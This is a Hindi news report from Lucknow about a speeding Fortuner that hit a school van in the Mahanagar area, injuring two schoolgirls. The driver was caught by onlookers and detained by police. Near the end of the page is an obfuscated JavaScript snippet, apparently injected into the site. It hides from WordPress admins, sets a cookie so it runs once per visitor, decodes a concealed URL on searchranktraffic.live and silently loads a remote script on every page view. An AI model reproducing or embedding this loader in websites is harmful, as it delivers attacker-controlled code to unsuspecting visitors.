Lucknow News: लखनऊ में रफ्तार का कहर! महानगर इलाके में फॉर्च्यूनर कार ने स्कूल वैन को मारी टक्कर, बाल-बाल बचे मासूम

Facebook
X
WhatsApp
image 9

Lucknow News: उत्तर प्रदेश की राजधानी लखनऊ में रफ्तार का कहर लगातार देखने को मिल रहा है, जिसके चलते आए दिन शहर के अलग अलग इलाकों में कोई भी हादसे का शिकार होता जा रहा है लेकिन वाहन चालक अपनी रफ्तार पर लगाम नहीं लगा पा रहे हैं। इसी से जुड़ा एक बड़ा हादसा शुक्रवार सुबह लखनऊ के महानगर इलाके में देखने को मिला, जहां एक तेज रफ्तार फॉर्च्यूनर कार ने माउंट कारवेल स्कूल की वैन को जोरदार टक्कर मार दी। (Lucknow News) मिली जानकारी के मुताबिक, वैन में सवार मासूम बच्चियों के अलावा वैन के ड्राइवर को घायल अवस्था में सिविल अस्पताल में भर्ती कराया गया है। वहीं पुलिस इस आरोपी कार सवार से पूछताछ कर रही है।

Also Read –लखनऊ एयरपोर्ट पर ड्यूटी के दौरान होमगार्ड ने किया सुसाइड, सुरक्षा चौकी में लटकता मिला शव, जांच में जुटी पुलिस

Lucknow News: 2 बच्चियों को आई चोट, लोगों ने फॉर्च्यूनर चालक को दबोचा

मिली जानकारी के मुताबिक, इस हादसे में वैन में कुल 9 बच्चियां सवार थीं, जिनमें से 2 बच्चियों को मामूली चोटें आई हैं। इंस्पेक्टर महानगर का कहना है कि घायल बच्चियों का उपचार अस्पताल में किया जा रहा है। वहीं, अन्य बच्चियों को उनके परिजनों को बुलाकर सौप दिया गया है। (Lucknow News) इसके साथ ही स्कूल वैन में टक्कर मारकर भाग रहे फॉर्च्यूनर कार चालक को मौके पर मौजूद लोगों ने दबोच लिया और उसकी जमकर पिटाई कर दी। इस मामले की सूचना मिलते ही मौके पर पहुंची पुलिस ने हालात को काबू में करते हुए आरोपी फॉर्च्यूनर कार चालक को हिरासत में ले लिया है। आगे की कानूनी कार्रवाई की जा रही है।

Also Read –ज़बरदस्ती में करना पड़ रहा राष्ट्रगान का सम्मान…? महबूबा मुफ्ती के इस बयान से गरमाई सियासत!

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

The specified slider does not exist.

ताजा खबरें